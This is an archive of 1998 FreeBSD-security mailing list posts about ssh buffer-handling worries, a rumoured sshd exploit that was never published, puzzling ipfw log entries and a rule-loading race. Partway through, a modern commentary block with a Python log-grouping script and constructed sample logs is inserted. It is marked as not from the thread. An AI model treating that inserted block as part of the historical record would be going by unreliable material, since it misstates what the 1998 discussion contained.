I learned a lot from all your answers. Thank you.

-- Jay

From owner-freebsd-security Tue Nov 3 19:41:51 1998
Date: Tue, 3 Nov 1998 22:36:35 -0500 (EST)
From: spork
To: Andrew McNaughton
Cc: Warner Losh, bow, FreeBSD-security@FreeBSD.ORG
Subject: Re: [rootshell] Security Bulletin #25 (fwd)

Sorry to bring this up again, but someone has posted on BugTraq stating they found a copy of an exploit for sshd (remote root). He claims to have tried it on his own machines with success. I know this could be entirely fake, but who really knows...

I contacted him privately urging him to contact CERT, AUS-CERT, IBM-ERS, etc. and provide the code to them. I also requested more info about his OS and version, whether the patches that were supplied protected him, and which auth methods are allowed in his sshd_config.

Sorry to bring this up again, but I thought perhaps the paranoid might be interested...

Thanks,
Charles

---
Charles Sprickman spork@super-g.com

On Tue, 3 Nov 1998, Andrew McNaughton wrote:

> On Mon, 2 Nov 1998, Warner Losh wrote:
>
> > Just so everyone knows, this advisory was only a draft advisory and
> > was cancelled over the weekend. I saw the original advisory and
> > checked stuff in based on it, since generally changes like this are
> > good and can't hurt anything. After I checked in the fixes to ssh, I
> > discovered that it had been determined that there was no way of
> > exploiting this buffer call because all the places that called it had
> > bounds checking.
>
> I had a brief look over the ssh code some months ago. I didn't find
> anything exploitable, but I did find things that made me uncomfortable,
> like the logging routine that uses vsprintf (or something similarly
> lacking in bounds checking) and expected all the places it was checked to
> do the bounds checking.
>
> As far as I looked, they pretty much did, though in one place I noted that
> it was dependent on the length of a domain name returned from a reverse
> lookup.
>
> Andrew

From owner-freebsd-security Tue Nov 3 20:38:14 1998
Message-Id: <199811040437.VAA26480@harmony.village.org>
To: spork
Subject: Re: [rootshell] Security Bulletin #25 (fwd)
Cc: Andrew McNaughton, bow, FreeBSD-security@FreeBSD.ORG
In-Reply-To: Your message of "Tue, 03 Nov 1998 22:36:35 EST."
Date: Tue, 03 Nov 1998 21:37:53 -0700
From: Warner Losh

In message spork writes:

: Sorry to bring this up again, but someone has posted on BugTraq stating
: they found a copy of an exploit for sshd (remote root). He claims to have
: tried it on his own machines with success.

I saw that too, but realized that it wouldn't be a big deal to cope with because it was in the logging routines and would be caught by the extra sanity checking that we put in there. I've not seen his claims in any of the other security lists that I'm on yet...

Warner

From owner-freebsd-security Tue Nov 3 21:30:04 1998
Date: Wed, 4 Nov 1998 16:29:40 +1100 (EST)
From: Nicholas Charles Brawn
To: Warner Losh
Cc: FreeBSD-security@FreeBSD.ORG
Subject: Re: [rootshell] Security Bulletin #25 (fwd)
In-Reply-To: <199811040437.VAA26480@harmony.village.org>

Well I just grabbed 1.2.26 and did:

find . -exec grep sprintf {} \; |wc -l

And came up with 138 lines. Just having sprintf() in your code is not indicative of a vulnerability, but it's still a high number.

Nick

--
Email: ncb05@uow.edu.au - http://rabble.uow.edu.au/~nick
Key fingerprint = DE 30 33 D3 16 91 C8 8D A7 F8 70 03 B7 77 1A 2A

From owner-freebsd-security Tue Nov 3 21:31:56 1998
Date: Wed, 4 Nov 1998 16:31:42 +1100 (EST)
From: Nicholas Charles Brawn
To: freebsd-security@FreeBSD.ORG
Subject: is ssh port patched?

Is the port of ssh patched against the latest round of potential overflows reported in the IBM-ERS alert?

Cheers,
Nick

--
Email: ncb05@uow.edu.au - http://rabble.uow.edu.au/~nick
Key fingerprint = DE 30 33 D3 16 91 C8 8D A7 F8 70 03 B7 77 1A 2A

From owner-freebsd-security Tue Nov 3 22:07:13 1998
Message-Id: <199811040606.XAA26928@harmony.village.org>
To: Nicholas Charles Brawn
Subject: Re: [rootshell] Security Bulletin #25 (fwd)
Cc: FreeBSD-security@FreeBSD.ORG
In-Reply-To: Your message of "Wed, 04 Nov 1998 16:29:40 +1100."
Date: Tue, 03 Nov 1998 23:06:52 -0700
From: Warner Losh

In message Nicholas Charles Brawn writes:

: find . -exec grep sprintf {} \; |wc -l
: And came up with 138 lines. Just having sprintf() in your code is not

True. If you look closely at all of those, you will find that they are, for the most part, bounds checked in the code. While that doesn't pass the grep test, it does tend to make things more secure.

Warner

From owner-freebsd-security Tue Nov 3 22:19:36 1998
From: Archie Cobbs
Message-Id: <199811040618.WAA20681@bubba.whistle.com>
Subject: Re: Is it an attack? Strange things logged by ipfw.
In-Reply-To: <363EBD86.74C9F6E2@sovlink.ru> from Alla Bezroutchko at "Nov 3, 98 11:23:34 am"
To: alla@sovlink.ru (Alla Bezroutchko)
Date: Tue, 3 Nov 1998 22:18:55 -0800 (PST)
Cc: security@FreeBSD.ORG

Alla Bezroutchko writes:

> I have an ipfw-based firewall and noticed a peculiar connections in its
> logs. Maybe this is some new kind of attack? Any comments appreciated.
> Here are the logs:
>
> Nov 3 00:44:53 buddy /kernel: ipfw: 65534 Deny TCP a.b.c.d:50818
> aaa.aaa.aaa.aaa:1333 in via ex0
> Nov 3 01:12:51 buddy /kernel: ipfw: 65534 Deny TCP e.f.g.h:50818
> aaa.aaa.aaa.aaa:1565 in via ex0
> Nov 2 11:15:37 buddy /kernel: ipfw: 65534 Deny TCP i.j.k.l:50818
> aaa.aaa.aaa.aaa:1725 in via ex0
> Oct 20 04:20:03 buddy /kernel: ipfw: 65534 Deny TCP m.n.o.p:50818
> aaa.aaa.aaa.aaa:2349 in via ex0
> Oct 20 09:22:35 buddy /kernel: ipfw: 65534 Deny TCP q.r.s.t:50818
> aaa.aaa.aaa.aaa:1493 in via ex0
> Oct 19 04:35:01 buddy /kernel: ipfw: 65534 Deny TCP u.v.w.x:50818
> aaa.aaa.aaa.aaa:2465 in via ex0

One lesson I've learned over the years: never rule out broken Windows machines :-)

-Archie
___________________________________________________________________________
Archie Cobbs * Whistle Communications, Inc.
* http://www.whistle.com

From owner-freebsd-security Tue Nov 3 23:11:27 1998
Date: Wed, 4 Nov 1998 20:10:00 +1300 (NZDT)
From: Andrew McNaughton
Reply-To: andrew@squiz.co.nz
To: Nicholas Charles Brawn
Cc: Warner Losh, FreeBSD-security@FreeBSD.ORG
Subject: Re: [rootshell] Security Bulletin #25 (fwd)

On Wed, 4 Nov 1998, Nicholas Charles Brawn wrote:

> Well I just grabbed 1.2.26 and did:
> find . -exec grep sprintf {} \; |wc -l
>
> And came up with 138 lines. Just having sprintf() in your code is not
> indicative of a vulnerability, but it's still a high number.

ssh is commonly used for piping substantial amounts of data, and can probably claim good reasons for using the faster non-bounds-checking routines in many of these cases. Doesn't apply to low volume things like the logging routines though.

Andrew

From owner-freebsd-security Wed Nov 4 01:45:13 1998
Date: Wed, 4 Nov 1998 14:42:36 +0500 (KGT)
From: CyberPsychotic
Reply-To: fygrave@tigerteam.net
To: Alla Bezroutchko
Cc: security@FreeBSD.ORG
Subject: Re: Is it an attack? Strange things logged by ipfw.
In-Reply-To: <363EBD86.74C9F6E2@sovlink.ru>

~
~ Nov 3 00:44:53 buddy /kernel: ipfw: 65534 Deny TCP a.b.c.d:50818
~ aaa.aaa.aaa.aaa:1333 in via ex0
~ Nov 3 01:12:51 buddy /kernel: ipfw: 65534 Deny TCP e.f.g.h:50818
~ aaa.aaa.aaa.aaa:1565 in via ex0
~ Nov 2 11:15:37 buddy /kernel: ipfw: 65534 Deny TCP i.j.k.l:50818
~ aaa.aaa.aaa.aaa:1725 in via ex0
~ Oct 20 04:20:03 buddy /kernel: ipfw: 65534 Deny TCP m.n.o.p:50818
[snip snip]
~
~ What stumbles me is why they all use the same source port.

nothing special. You could bind locally any port you want. It doesn't seem like a probing either, since these ports ain't registered among reserved port numbers. could be kind of trojan probin'.. yeah, but hardly.. trojans love to use 31337 ports :-)).

as someone already mentioned:
Nothing will help brain-damaged windoze machines. :)

From owner-freebsd-security Wed Nov 4 02:07:25 1998
Message-ID: <3640275A.C3D01E5C@sovlink.ru>
Date: Wed, 04 Nov 1998 13:07:22 +0300
From: Alla Bezroutchko
To: security@FreeBSD.ORG
Subject: Re: Is it an attack? Strange things logged by ipfw - more on that

CyberPsychotic wrote:

> ~ Nov 3 00:44:53 buddy /kernel: ipfw: 65534 Deny TCP a.b.c.d:50818
> ~ aaa.aaa.aaa.aaa:1333 in via ex0
> ~ Nov 3 01:12:51 buddy /kernel: ipfw: 65534 Deny TCP e.f.g.h:50818
> ~ aaa.aaa.aaa.aaa:1565 in via ex0
> ~ Nov 2 11:15:37 buddy /kernel: ipfw: 65534 Deny TCP i.j.k.l:50818
> ~ aaa.aaa.aaa.aaa:1725 in via ex0
> ~ Oct 20 04:20:03 buddy /kernel: ipfw: 65534 Deny TCP m.n.o.p:50818

Some recent investigations showed even more interesting things. There were connection attempts to three different IPs. One, as mentioned, doesn't belong to anything, another is a '95 box and the third one is an HP printer. Every destination address corresponds to a source port. Source IPs are different but some are used twice or thrice. Source ports used: 50818, 20330, 26157. This is logged since October 5th (maybe it started earlier, I kept logs only for a month) till yesterday, sometimes one probe in two or three days, sometimes four probes a day.

> Nothing will help brain-damaged windoze machines. :)

Checked. Some of the source IPs belong to 'doze machines, some don't. Brain damaged unix? ;)

Ideas?

Alla.
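What Alla found by hand in her two posts above (one fixed source port per destination, reused from many unrelated source hosts, over a month of `Deny` lines) is the kind of pattern worth pulling out of an ipfw log mechanically, because a client's ephemeral source port normally changes with every connection. The following is an added example, not code from anyone in the thread: it parses lines in the `ipfw: <rule> Deny TCP src:sport dst:dport in via iface` format shown above and groups them by (source port, destination), keeping only ports reused from several distinct hosts. The sample log is constructed for the example, with RFC 5737 documentation addresses standing in for the anonymised `a.b.c.d` and `aaa.aaa.aaa.aaa`; the unrelated `sshd` line is there to show that non-ipfw lines are skipped rather than misparsed.

```python
"""Group ipfw 'Deny' log lines by reused source port.

Added example, not from the thread. The sample log below is constructed in
the format of the original post, with RFC 5737 documentation addresses in
place of the anonymised a.b.c.d / aaa.aaa.aaa.aaa.
"""
import re
from collections import defaultdict

# syslog timestamp, host, then the ipfw fields as they appear in the post
LINE_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2} \d\d:\d\d:\d\d) (?P<host>\S+) /kernel: ipfw: "
    r"(?P<rule>\d+) (?P<action>\w+) (?P<proto>\w+) "
    r"(?P<src>[\d.]+):(?P<sport>\d+) (?P<dst>[\d.]+):(?P<dport>\d+) "
    r"(?P<direction>in|out) via (?P<iface>\S+)$"
)

# Constructed sample: three hosts reuse 50818 toward one address, two reuse
# 20330 toward another, plus one ordinary client connection and a non-ipfw line.
SAMPLE_LOG = """\
Nov  3 00:44:53 buddy /kernel: ipfw: 65534 Deny TCP 192.0.2.10:50818 198.51.100.7:1333 in via ex0
Nov  3 01:12:51 buddy /kernel: ipfw: 65534 Deny TCP 192.0.2.22:50818 198.51.100.7:1565 in via ex0
Nov  2 11:15:37 buddy /kernel: ipfw: 65534 Deny TCP 203.0.113.5:50818 198.51.100.7:1725 in via ex0
Oct 20 04:20:03 buddy /kernel: ipfw: 65534 Deny TCP 192.0.2.22:20330 198.51.100.9:2349 in via ex0
Oct 20 09:22:35 buddy /kernel: ipfw: 65534 Deny TCP 203.0.113.40:20330 198.51.100.9:1493 in via ex0
Oct 19 04:35:01 buddy /kernel: ipfw: 65534 Deny TCP 192.0.2.77:26157 198.51.100.12:2465 in via ex0
Oct 19 04:35:02 buddy /kernel: ipfw: 65534 Deny TCP 192.0.2.77:1031 198.51.100.9:80 in via ex0
Oct 19 04:36:00 buddy sshd[123]: Connection from 192.0.2.77 port 1032
"""


def parse_line(line):
    """Return the fields of one ipfw log line as a dict, or None if it is not one."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    for key in ("rule", "sport", "dport"):
        rec[key] = int(rec[key])
    return rec


def fixed_source_port_report(lines, min_sources=2, action="Deny"):
    """Map (source port, destination) -> sorted distinct source hosts.

    Only pairs where the same source port arrived from at least min_sources
    different hosts are kept: ephemeral client ports vary per connection, so
    one port reused from many unrelated hosts toward one address is the
    anomaly Alla describes, whatever its ultimate cause.
    """
    sources = defaultdict(set)
    for line in lines:
        rec = parse_line(line)
        if rec is None or rec["action"] != action:
            continue
        sources[(rec["sport"], rec["dst"])].add(rec["src"])
    return {key: sorted(hosts) for key, hosts in sources.items() if len(hosts) >= min_sources}


def ports_by_destination(report):
    """Invert the report: destination -> sorted reused source ports (one per target, as observed)."""
    out = defaultdict(set)
    for sport, dst in report:
        out[dst].add(sport)
    return {dst: sorted(ports) for dst, ports in out.items()}


if __name__ == "__main__":
    report = fixed_source_port_report(SAMPLE_LOG.splitlines())
    for (sport, dst), hosts in sorted(report.items(), key=lambda kv: -len(kv[1])):
        print(f"sport {sport} -> {dst}: {len(hosts)} distinct sources: {', '.join(hosts)}")
    print("ports per destination:", ports_by_destination(report))
```

The report only groups what the firewall already logged; it does not say why the packets arrive. The candidates raised in the thread (a broken stack that never rotates its source port, a misbehaving router splicing sessions, a probe) all look the same in this view, which is why Andrew's suggestion to traceroute the sources and contact their owners is the next step rather than more log parsing.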
To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Nov 4 05:11:53 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id FAA19522 for freebsd-security-outgoing; Wed, 4 Nov 1998 05:11:53 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from aniwa.sky (p8-max3.wlg.ihug.co.nz [209.79.142.72]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id FAA19516 for ; Wed, 4 Nov 1998 05:11:48 -0800 (PST) (envelope-from andrew@squiz.co.nz) Received: from localhost (andrew@localhost) by aniwa.sky (8.8.8/8.8.7) with SMTP id CAA08282; Thu, 5 Nov 1998 02:11:07 +1300 (NZDT) (envelope-from andrew@squiz.co.nz) Date: Thu, 5 Nov 1998 02:11:06 +1300 (NZDT) 
From: Andrew McNaughton X-Sender: andrew@aniwa.sky Reply-To: andrew@squiz.co.nz To: Alla Bezroutchko cc: security@FreeBSD.ORG Subject: Re: Is it an attack? Strange things logged by ipfw - more on that In-Reply-To: <3640275A.C3D01E5C@sovlink.ru> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, 4 Nov 1998, Alla Bezroutchko wrote: > > Nothing will help brain-damaged windoze machines. :) > > Checked. Some of source IPs belong to 'doze machines, some don't. > Brain damaged unix? ;) Have you talked to the owners of any of the machines? Are they related in any way? I had a whole lot of seemingly unrelated packets a while back that turned out to be due to a faulty router at a major ISP in the UK. It seems that the router was splitting the tcp headers from their bodies, and under heavy load was putting some of them back together wrong so that I got packets from unrelated sessions. The ISP serviced many domains so it took me a while to realize that it was coming from the one place. Traceroute is helpful for that. Andrew To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Nov 4 05:26:02 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id FAA21909 for freebsd-security-outgoing; Wed, 4 Nov 1998 05:26:02 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from heidegger.uol.com.br (heidegger.uol.com.br [200.230.198.88]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id FAA21619 for ; Wed, 4 Nov 1998 05:25:44 -0800 (PST) (envelope-from agora@agoractvm.com.br) Received: from agoractvm.com.br (rjo-1-as01-7-a28.gd.uol.com.br [200.224.131.28]) by heidegger.uol.com.br (8.9.1/8.9.1) with ESMTP id LAA17040; Wed, 4 Nov 1998 11:26:57 -0200 (EDT) Message-ID: <364054DC.DF96B116@agoractvm.com.br> Date: Wed, 04 Nov 1998 11:21:32 -0200 
From: =?iso-8859-1?Q?Teleinform=E1tica?= Reply-To: agora@uol.com.br Organization: =?iso-8859-1?Q?=C1GORA?= C.T.V.M. S/A X-Mailer: Mozilla 4.5 [en] (Win98; I) X-Accept-Language: en MIME-Version: 1.0 To: FreeBSD Security CC: Cristiano Colpani , Guilherme Galileo Cox , "Nilson R. A. de Brito" Subject: [Fwd: SSHD Exploit] Content-Type: multipart/mixed; boundary="------------0025AF466B75829A90012340" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org This is a multi-part message in MIME format. --------------0025AF466B75829A90012340 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit -- Regards, _______________________ | Nelson 'Stderr' Brito |_________________________________ |_________________________________________________________| |Finger Print: | A2E0 D90E 413A 515A 10C9 C0CE 4855 D523 | | E-mail: | nelson@cyberspace.org | | URL: | http://www.angelfire.com/sd/stderr | | Public key: | See the URL | |______________|__________________________________________| |ooooooooooooooooooooooooooooooooooooooooooooooooooooooooo| ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ --------------0025AF466B75829A90012340 Content-Type: message/rfc822 Content-Transfer-Encoding: 7bit Content-Disposition: inline Received: by pascal (mbox agora) (with Cubic Circle's cucipop (v1.22 1998/04/11) Wed Nov 4 09:24:47 1998) X-From_: root Wed Nov 4 01:08:10 1998 Received: from brimstone.netspace.org (brimstone.netspace.org [128.148.157.143]) by pascal.uol.com.br (8.9.1/8.9.1) with ESMTP id BAA12002; Wed, 4 Nov 1998 01:08:03 -0200 (EDT) Received: from netspace.org ([128.148.157.6]:54856 "EHLO netspace.org" ident: "TIMEDOUT2") by brimstone.netspace.org with ESMTP id <77774-27536>; Tue, 3 Nov 1998 21:37:34 -0500 Received: from NETSPACE.ORG by NETSPACE.ORG (LISTSERV-TCP/IP release 1.8c) with spool id 4569238 for BUGTRAQ@NETSPACE.ORG; Tue, 3 Nov 1998 21:30:42 -0500 Approved-By: aleph1@DFW.NET Received: from gti.net (apollo.gti.net 
[199.171.27.7]) by netspace.org (8.8.7/8.8.7) with ESMTP id RAA18872 for ; Sun, 1 Nov 1998 17:05:06 -0500 Received: from localhost (jfoutts@localhost) by gti.net (8.9.1/8.8.8) with ESMTP id RAA24814 for ; Sun, 1 Nov 1998 17:05:07 -0500 (EST) MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Message-ID: Date: Sun, 1 Nov 1998 17:05:07 -0500 Reply-To: Justin Foutts Sender: Bugtraq List From: Justin Foutts Subject: SSHD Exploit To: BUGTRAQ@netspace.org X-Mozilla-Status2: 00000000 On a system I administer I found a program named sshdwarez.c in one of my user's home directories. Upon further inspection I found that this was the source code of an x86/Linux remote buffer overflow exploit for sshd versions 1.2.26 and below. I have tested this exploit on a number of my systems and have obtained remote root access on each one. I will not post this exploit as it could give crackers a tool to gain unauthorized access to systems. I STRONGLY recommend that everyone upgrade their versions of sshd as soon as possible. Thanks! Justin --------------0025AF466B75829A90012340-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Nov 4 05:28:18 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id FAA22617 for freebsd-security-outgoing; Wed, 4 Nov 1998 05:28:18 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from mail.webspan.net (mail.webspan.net [206.154.70.7]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id FAA22611 for ; Wed, 4 Nov 1998 05:28:16 -0800 (PST) (envelope-from opsys@mail.webspan.net) Received: from orion.webspan.net (orion.webspan.net [206.154.70.5]) by mail.webspan.net (WEBSPAN/970608) with SMTP id IAA16942 for ; Wed, 4 Nov 1998 08:28:09 -0500 (EST) Date: Wed, 4 Nov 1998 08:28:08 -0500 (EST) 
From: Open Systems Networking X-Sender: opsys@orion.webspan.net To: freebsd-security@FreeBSD.ORG Subject: Amazing wonder packet sneaks by deny all rule? Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

It's really late/early this morning and I was just checking the rule set on a client's machine I just built. When I saw this:

65534 195 14104 deny log ip from any to any
65535 1 76 deny ip from any to any

Now maybe it's my lack of sleep, but how did that amazing wonder packet on rule 65535 sneak by 65534 :-) A fluke? A 1 in a million chance? A possessed packet? This isn't exactly the kind of thing that instills confidence in one's choice of firewall software :-) It's ipfw BTW if you can't tell from the syntax, not ipfilter. I have NEVER seen this happen before, so I'm guessing it's just a freak accident. But it is curious nonetheless.

Chris

-- "You both seem to be ignoring the fact that the networking market is driven by so-called 'IT professionals' these days, most of whom can't tell the difference between an ARP and a carp." --Wes Peters ===================================| Open Systems FreeBSD Consulting. FreeBSD 3.0 is available now! | Phone: (402)573-9124 / ICQ # 20016186 -----------------------------------| 3335 N. 103 Plaza, Omaha, NE 68134 FreeBSD: The power to serve!
| E-Mail: opsys@open-systems.net http://www.freebsd.org | Consulting, Network Engineering, Security ===================================| http://open-systems.net To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Nov 4 07:26:53 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id HAA10603 for freebsd-security-outgoing; Wed, 4 Nov 1998 07:26:53 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from time.cdrom.com (time.cdrom.com [204.216.27.226]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id HAA10598 for ; Wed, 4 Nov 1998 07:26:52 -0800 (PST) (envelope-from jkh@time.cdrom.com) Received: from time.cdrom.com (jkh@localhost.cdrom.com [127.0.0.1]) by time.cdrom.com (8.8.8/8.8.8) with ESMTP id HAA05773; Wed, 4 Nov 1998 07:26:26 -0800 (PST) (envelope-from jkh@time.cdrom.com) To: agora@uol.com.br cc: FreeBSD Security , Cristiano Colpani , Guilherme Galileo Cox , "Nilson R. A. de Brito" Subject: Re: [Fwd: SSHD Exploit] In-reply-to: Your message of "Wed, 04 Nov 1998 11:21:32 -0200." <364054DC.DF96B116@agoractvm.com.br> Date: Wed, 04 Nov 1998 07:26:25 -0800 Message-ID: <5769.910193185@time.cdrom.com> 
From: "Jordan K. Hubbard" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Bah. *More* rumors without proof. "I will not post this exploit.." Sigh... - Jordan To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Nov 4 07:40:11 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id HAA12455 for freebsd-security-outgoing; Wed, 4 Nov 1998 07:40:11 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from phoenix (phoenix.aye.net [206.185.8.134]) by hub.freebsd.org (8.8.8/8.8.8) with SMTP id HAA12445 for ; Wed, 4 Nov 1998 07:40:07 -0800 (PST) (envelope-from brich@aye.net) Received: (qmail 25203 invoked by uid 7506); 4 Nov 1998 15:31:54 -0000 Received: from localhost (sendmail-bs@127.0.0.1) by localhost with SMTP; 4 Nov 1998 15:31:54 -0000 Date: Wed, 4 Nov 1998 10:31:54 -0500 (EST) 
From: Barrett Richardson To: spork cc: Andrew McNaughton , Warner Losh , bow , FreeBSD-security@FreeBSD.ORG Subject: Re: [rootshell] Security Bulletin #25 (fwd) In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I also contacted him and urged him to release the code to the appropriate authorities, maybe he'll give in. I recently got the stackguard compiler http://www.cse.ogi.edu/DISC/projects/immunix/StackGuard/ up and going on my 2.2.7 box. I had high hopes that some definitive info of the SSH exploit would surface so I could test it against something real. - Barrett On Tue, 3 Nov 1998, spork wrote: > Sorry to bring this up again, but someone has posted on BugTraq stating > they found a copy of an exploit for sshd (remote root). He claims to have > tried it on his own machines with success. > > I know this could be entirely fake, but who really knows... > > I contacted him privately urging him to contact CERT, AUS-CERT, IBM-ERS, > etc. and provide the code to them. I also requested more info about his > OS and version, whether the patches that were supplied protected him, and > which auth methods are allowed in his sshd_config. > > Sorry to bring this up again, but I thought perhaps the paranoid might be > interested... > > Thanks, > > Charles > > --- > Charles Sprickman > spork@super-g.com > > On Tue, 3 Nov 1998, Andrew McNaughton wrote: > > > On Mon, 2 Nov 1998, Warner Losh wrote: > > > > > Just so everyone knows, this advisory was only a draft advisory and > > > was cancelled over the weekend. I saw the original advisory and > > > checked stuff in based on it, since generally changes like this are > > > good and can't hurt anything. After I checked in the fixes to ssh, I > > > discovered that it had been determined that there was no way of > > > exploiting this buffer call because all the places that called it had > > > bounds checking. 
> > > > I had a brief look over the ssh code some months ago. I didn't find > > anything exploitable, but I did find things that made me uncomfortable, > > like the logging routine that uses vsprintf (or something similarly > > lacking in bounds checking) and expected all the places it was checked to > > do the bounds checking. > > > > As far as I looked, they pretty much did, though in one place I noted that > > it was dependent on the length of a domain name returned from a reverse > > lookup. > > > > Andrew > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > with "unsubscribe freebsd-security" in the body of the message > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Nov 4 08:12:05 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id IAA16839 for freebsd-security-outgoing; Wed, 4 Nov 1998 08:12:05 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from rucus.ru.ac.za (rucus.ru.ac.za [146.231.29.2]) by hub.freebsd.org (8.8.8/8.8.8) with SMTP id IAA16677 for ; Wed, 4 Nov 1998 08:11:46 -0800 (PST) (envelope-from nbm@rucus.ru.ac.za) Received: (qmail 5101 invoked by uid 1003); 4 Nov 1998 16:11:22 -0000 Message-ID: <19981104181121.A4160@rucus.ru.ac.za> Date: Wed, 4 Nov 1998 18:11:21 +0200 
From: Neil Blakey-Milner To: Open Systems Networking , freebsd-security@FreeBSD.ORG Subject: Re: Amazing wonder packet sneaks by deny all rule? References: Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.93.2i In-Reply-To: ; from Open Systems Networking on Wed, Nov 04, 1998 at 08:28:08AM -0500 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed 1998-11-04 (08:28), Open Systems Networking wrote: > It's really late/early this morning and I was just checking the rule set > on a clients machine I just built. When I saw this: > > 65534 195 14104 deny log ip from any to any > 65535 1 76 deny ip from any to any > > Now maybe it's my lack of sleep but how did that amazing wonder packet > on rule 65535 sneak by 65534 :-) A fluke? A 1 in a million chance? I think the packet is likely to have arrived after firewalling kicked in, and before you added your 65534 rule. Neil -- Neil Blakey-Milner nbm@rucus.ru.ac.za To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Nov 4 08:42:05 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id IAA20315 for freebsd-security-outgoing; Wed, 4 Nov 1998 08:42:05 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from fledge.watson.org (COPLAND.CODA.CS.CMU.EDU [128.2.222.48]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id IAA20307 for ; Wed, 4 Nov 1998 08:42:01 -0800 (PST) (envelope-from robert@cyrus.watson.org) Received: from fledge.watson.org (robert@fledge.pr.watson.org [192.0.2.3]) by fledge.watson.org (8.8.8/8.8.8) with SMTP id LAA29436; Wed, 4 Nov 1998 11:41:33 -0500 (EST) Date: Wed, 4 Nov 1998 11:41:32 -0500 (EST) 
From: Robert Watson X-Sender: robert@fledge.watson.org Reply-To: Robert Watson To: Open Systems Networking cc: freebsd-security@FreeBSD.ORG Subject: Re: Amazing wonder packet sneaks by deny all rule? In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=ISO-8859-1 Content-Transfer-Encoding: 8bit X-MIME-Autoconverted: from QUOTED-PRINTABLE to 8bit by hub.freebsd.org id IAA20309 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

On Wed, 4 Nov 1998, Open Systems Networking wrote:
> It's really late/early this morning and I was just checking the rule set
> on a client's machine I just built. When I saw this:
>
> 65534 195 14104 deny log ip from any to any
> 65535 1 76 deny ip from any to any
>
> Now maybe it's my lack of sleep but how did that amazing wonder packet
> on rule 65535 sneak by 65534 :-) A fluke? A 1 in a million chance?
> A possessed packet? This isn't exactly the kind of thing that instills
> confidence in one's choice of firewall software :-)
> It's ipfw BTW if you can't tell from the syntax, not ipfilter.
> I have NEVER seen this happen before, so I'm guessing it's just a freak
> accident. But it is curious nonetheless.

Chris,

My guess is that it is a race condition. The packet arrived between when your network interface went up and when the ruleset was added. Because your default policy is deny, it worked fine. However, this does actually bring interesting risks to mind: as long as the rules are added in numeric order, and the default policy is deny, you should always get consistent (if overly draconian) policy during bootup. However, if you have your ipfw lines not in the rule order, then some allows might be installed in the list of rules *before* the denies that precede them. In this situation, the race condition would allow a packet in that should not have been allowed in. The whole effect is because the installation of ipfw rules is non-atomic. I wondered for a while about the same thing on some of my systems.
